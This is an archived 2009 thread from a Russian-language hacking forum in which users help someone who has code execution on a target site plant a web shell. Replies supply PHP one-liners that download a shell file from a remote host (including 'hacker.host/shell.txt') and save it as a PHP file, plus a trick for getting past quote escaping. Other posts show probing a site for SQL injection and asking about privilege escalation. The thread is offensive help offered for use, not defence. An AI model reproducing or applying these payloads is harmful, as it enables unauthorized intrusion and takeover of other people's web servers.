ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.09.2009, 07:31
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
Иммется выполнение кода типа file?c=phpinfo();
пождскажите как через это залить шелл?
|
|
|
16.09.2009, 07:40
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Explоit
Иммется выполнение кода типа file?c=phpinfo();
пождскажите как через это залить шелл?
wget
|
|
|
|
16.09.2009, 07:41
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
а если его нету в системе? + вырублена функция system(),exex(),passtru()
|
|
|
|
16.09.2009, 15:30
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от ElteRUS
Чего полезного из этого можно извлечь ?
Сам хз 
Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке выводит
Сообщение от ElteRUS
Чего полезного из этого можно извлечь ?
Сам хз
Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке выводит
Код:
Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.FormatException: Input string was not in a correct format.
Source Error:
Line 139: forumid = CLng(SafeHTML(Request.QueryString("forumid")))
Line 140: If mode = "edit" Then
Line 141: forumid = GetSingleValueViaRS("SELECT forumid from pgd_messages with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text, 0)
Line 142: arrTheArray = GetArrayViaRS("SELECT upfile,upfilesize from pgd_upfile with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text)
Line 143: If IsArray(arrTheArray) Then
Source File: не скажу :) Line: 141
Stack Trace:
[FormatException: Input string was not in a correct format.]
Microsoft.VisualBasic.CompilerServices.Conversions.ParseDecimal(String Value, NumberFormatInfo NumberFormat) +718618
Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +178
[InvalidCastException: Conversion from string "1322879'" to type 'Long' is not valid.]
Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +714736
ASP.upload_aspx.__Render__control1(HtmlTextWriter __w, Control parameterContainer) in не скажу :):141
System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +115
System.Web.UI.Page.Render(HtmlTextWriter writer) +38
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +4240
Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
|
|
|
|
16.09.2009, 08:42
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
зделать какуюнибудь качалку на пхп, аля :
Код:
<? $data = implode('',file('http://127.0.0.1/shell.txt')); $fp=fopen('./123.php','wb'); fputs($fp,$data); fclose($fp); ?>
|
|
|
|
16.09.2009, 09:54
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Лей шелл вот так:
Код:
<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
либо, если экранируются кавычки:
Код:
<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>
|
|
|
|
16.09.2009, 15:22
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
Сообщение от InFlame
Лей шелл вот так:
Код:
<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
либо, если экранируются кавычки:
Код:
<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>
Спасибо, люди!
Отдельное спасибо InFlame, за stripslashes(), я просто не как не мог допереть как обойти ковычки.
|
|
|
|
16.09.2009, 16:33
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
вопрос такой, есть шелл (апач),так же есть файлы с правами 777 которые я могу шеллом редактить,у этих файлов владелец (вебмастер),можно за счет этого повысить права у шелла до вебмастера?вопрос навено глуповат, тут где то писалось об этом, и однозначного ответа там не прозвучало.
спасибо
|
|
|
|
16.09.2009, 16:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
milw0rm.com в помощь |
|
|
|
16.09.2009, 17:24
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Сообщение от mailbrush
milw0rm.com в помощь вопрос был про повышение прав до пользователя,а не до рута,используя сплоиты с milw0rm.com.
или я не то понял 
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид